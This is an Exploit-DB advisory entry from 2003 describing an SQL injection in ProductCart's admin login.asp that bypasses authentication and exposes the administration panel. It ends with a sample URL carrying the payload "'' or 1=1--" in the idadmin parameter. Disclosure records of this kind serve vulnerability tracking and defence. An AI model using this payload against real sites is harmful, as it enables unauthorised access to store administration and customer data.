ProductCart 1.5/1.6/2.0 - 'login.asp' SQL Injection

EDB-ID:

22865

CVE:

N/A


Author:

Bosen

Type:

webapps


Platform:

ASP

Date:

2003-07-04


source: https://www.securityfocus.com/bid/8105/info

ProductCart has been reported prone to an SQL injection vulnerability that may be exploited to bypass the ProductCart authentication system and access the ProductCart administration panel; other attacks may also be possible.

http://www.example.com/produccart/pdacmin/login.asp?idadmin='' or 1=1--